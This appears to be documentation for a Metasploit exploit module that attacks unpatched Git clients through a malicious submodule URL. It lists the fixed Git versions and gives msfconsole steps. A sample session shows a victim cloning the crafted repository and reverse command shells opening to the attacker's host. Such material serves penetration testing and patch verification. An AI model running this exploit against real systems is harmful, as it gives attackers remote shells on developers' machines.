## Vulnerable Application

  Git can be installed on a variety of operating systems, however
  newer versions may contain the patch for this vulnerability.

  On OSX it can be installed with the XCode command line tools:
  ```xcode-select --install```
  
  On Linux it can be installed with apt:
  ```sudo apt-get update && sudo apt-get install git```

  You can check the version with ```git --version```.
  The fix is included in the following version:
    2.7.6, 2.8.6, 2.9.5, 2.10.4, 2.11.3, 2.12.4, 2.13.5, 2.14.1

## Verification Steps

  Example steps in this format:

  1. Install the application
  1. Start msfconsole
  1. Do: ```use exploit/multi/http/git_submodule_command_exec```
  1. Do: ```set SRVHOST [local host]```
  1. Do: ```set LHOST [local host]```
  1. Do: ```exploit```
  1. Clone the malicious Git URI and its submodules
  1. You should get a shell

## Options

### GIT_URI

  This is the URI the git repository will be hosted from (defaults to random).

### GIT_SUBMODULE

  This is the URI of the submodule within the git repository (defaults to random).
  The url of this submodule, when cloned, will execute the payload.

## Scenarios

  Example usage against a macOS Sierra x64 bit target running git version 2.10.1

```
msf > use exploit/multi/http/git_submodule_command_exec
msf exploit(git_submodule_command_exec) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf exploit(git_submodule_command_exec) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(git_submodule_command_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.0.1:4444
msf exploit(git_submodule_command_exec) > [*] Using URL: http://192.168.0.1:8080/D29MF1UC
[*] Server started.
[*] Malicious Git URI is http://192.168.0.1:8080/ldnwrixuqq.git
***
Victim executes: git clone http://192.168.0.1:8080/ldnwrixuqq.git --recurse-submodules
***
[*] Command shell session 1 opened (192.168.0.1:4444 -> 192.168.0.1:55151) at 2017-08-29 16:54:56 +0800
[*] Command shell session 2 opened (192.168.0.1:4444 -> 192.168.0.1:55152) at 2017-08-29 16:54:56 +0800
```
